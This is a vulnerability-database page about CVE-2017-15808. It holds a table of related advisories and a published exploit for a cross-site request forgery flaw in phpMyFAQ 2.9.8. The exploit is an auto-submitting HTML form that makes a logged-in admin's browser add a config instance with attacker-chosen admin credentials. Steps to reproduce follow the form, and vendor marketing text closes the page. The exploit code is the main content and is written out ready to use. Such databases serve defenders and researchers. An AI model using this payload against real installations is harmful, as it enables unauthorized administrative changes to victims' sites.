| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2017-15808 | 16 Apr 202514:56 | โ | circl | |
| Cross-site request forgery vulnerability in phpMyFaq admin/ajax.config.php file | 24 Oct 201700:00 | โ | cnvd | |
| CVE-2017-15808 | 23 Oct 201717:00 | โ | cve | |
| CVE-2017-15808 | 23 Oct 201717:00 | โ | cvelist | |
| EUVD-2017-7230 | 7 Oct 202500:30 | โ | euvd | |
| CVE-2017-15808 | 23 Oct 201717:29 | โ | nvd | |
| phpMyFAQ < 2.9.9 Multiple XSS And CSRF Vulnerabilities | 21 Sep 201700:00 | โ | openvas | |
| CVE-2017-15808 | 23 Oct 201717:29 | โ | osv | |
| ๐ phpMyFAQ 2.9.8 Cross Site Request Forgery | 4 Dec 202500:00 | โ | packetstorm | |
| Cross site request forgery (csrf) | 23 Oct 201717:29 | โ | prion |
# Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808
PoC:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php" method="GET">
<input type="hidden" name="action" value="ajax">
<input type="hidden" name="ajax" value="config">
<input type="hidden" name="ajaxaction" value="add_instance">
<input type="hidden" name="url" value="malicious">
<input type="hidden" name="instance" value="malicious_instance">
<input type="hidden" name="comment" value="CSRF Test">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="admin" value="attacker">
<input type="hidden" name="password" value="password123">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Steps to Reproduce:
1. Save the following code as poc.html.
2. Log in phpmyfaq, and open the file in the same browser.
3. The outcome will occur.Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation